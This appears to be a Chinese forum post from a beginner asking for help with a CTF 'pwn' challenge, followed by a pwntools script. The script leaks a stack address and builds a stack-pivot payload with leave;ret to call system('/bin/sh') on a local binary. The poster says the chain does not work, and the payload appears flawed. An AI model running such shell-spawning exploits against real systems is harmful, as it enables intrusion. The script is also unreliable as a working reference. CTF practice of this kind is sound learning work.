你们好,我是一个PWN新手,入门pwn不久,做了一道题,我觉得是stackpivot,已经劫持栈到我可以写的区域,但是不会写ROP,这道题我做了很久,很想得到答案,求助~~谢谢帮助我的人
from pwn import *
#breakpoints=[0x80485b9,0x80485E0]
sh = process('./pwn2')
pwn2 = ELF('./pwn2')
offset = 0x27
system_plt = 0x8048400
get_flag = 0x804854B
call_system = 0x8048559
leave_ret_addr = 0x080484b8
read_plt = 0x80483D0
cmd = '/bin/sh'
data_addr = 0x804a028
#gdb.attach(sh)
payload1 = 'a'*offset
sh.sendline(payload1)
sh.recvuntil('a'*offset+'\x0a')
ebp_addr = u32(sh.recv(4))
log.success('ebp_addr:'+str(hex(ebp_addr)))
buf_addr = ebp_addr-0x38
payload2 = '1111'
payload2 += p32(pwn2.plt['system'])
payload2 += p32(0xdeadbeef)
payload2 += '/bin/sh'
payload2 += p32(pwn2.plt['system'])
payload2 += p32(0xdeadbeef)
payload2 += p32(buf_addr+0x0c)
payload2 = payload2.ljust(0x28,'\x00')
payload2 += p32(buf_addr)
payload2 += p32(leave_ret_addr)
sh.sendline(payload2)
sh.recvuntil('1111')
sh.interactive()